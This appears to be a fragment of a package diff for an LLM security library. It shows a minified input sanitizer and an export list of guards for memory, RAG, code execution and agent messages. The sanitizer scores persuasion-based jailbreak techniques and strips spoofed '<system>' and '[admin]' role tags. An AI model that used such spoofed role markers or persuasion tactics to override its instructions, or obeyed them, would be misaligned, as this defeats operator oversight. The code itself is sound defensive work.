r=Array.from(a),c=r.length>=this.minPersuasionTechniques;return{detected:p>=this.papThreshold||c,techniques:s,categories:r,compoundAttack:c,persuasionScore:Math.min(1,p)}}basicSanitize(e){return e.replace(/<\/?system>/gi,"").replace(/\[system\]/gi,"").replace(/\[admin\]/gi,"").replace(/```system/gi,"```").trim()}addPattern(e,i,s){this.patterns.push({pattern:e,weight:i,name:s})}setThreshold(e){this.threshold=Math.max(0,Math.min(1,e))}setPAPThreshold(e){this.papThreshold=Math.max(0,Math.min(1,e))}setPAPDetection(e){this.detectPAP=e}static getPAPCategories(){return["authority","scarcity","social_proof","reciprocity","commitment","liking","fear","logical_appeal","evidence","emotional"]}}exports.InputSanitizer=InputSanitizer;
package/dist/index.d.ts CHANGED
@@ -33,7 +33,7 @@ export { EncodingDetector, EncodingDetectorConfig } from "./guards/encoding-dete
33
33
  export { MultiModalGuard, MultiModalGuardConfig, MultiModalContent, MultiModalGuardResult } from "./guards/multimodal-guard";
34
34
  export { MemoryGuard, MemoryGuardConfig, MemoryItem, MemoryGuardResult } from "./guards/memory-guard";
35
35
  export { RAGGuard, RAGGuardConfig, RAGDocument, RAGGuardResult, EmbeddingAttackResult } from "./guards/rag-guard";
36
- export { CodeExecutionGuard, CodeExecutionGuardConfig, CodeAnalysisResult, SandboxConfig } from "./guards/code-execution-guard";
36
+ export { CodeExecutionGuard, CodeExecutionGuardConfig, CodeAnalysisResult, SandboxConfig, CodeFinding, CodeAnalyzerBackend } from "./guards/code-execution-guard";
37
37
  export { AgentCommunicationGuard, AgentCommunicationGuardConfig, AgentIdentity, AgentMessage, MessageValidationResult } from "./guards/agent-communication-guard";
38
38
  export { CircuitBreaker, CircuitBreakerConfig, CircuitState, CircuitStats, CircuitBreakerResult } from "./guards/circuit-breaker";
39
39
  export { DriftDetector, DriftDetectorConfig, BehaviorSample, BaselineProfile, DriftAnalysis, DriftDetectorResult } from "./guards/drift-detector";